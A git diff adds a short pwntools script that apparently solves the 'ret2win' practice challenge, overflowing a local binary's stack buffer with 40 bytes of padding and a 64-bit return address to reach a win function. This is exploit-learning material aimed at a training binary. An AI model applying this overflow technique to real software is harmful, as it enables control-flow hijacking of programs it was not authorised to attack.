diff --git a/ret2win64.py b/ret2win64.py new file mode 100644 index 0000000..2b3792b --- /dev/null +++ b/ret2win64.py @@ -0,0 +1,18 @@ +from pwn import * +target=process('./ret2win') + +#inital payload +payload="A"*40 + +#return address +ret2win=0x400811 + +#final payload +payload+=p64(ret2win) + +#send payload +target.sendline(payload) + +target.interactive() + +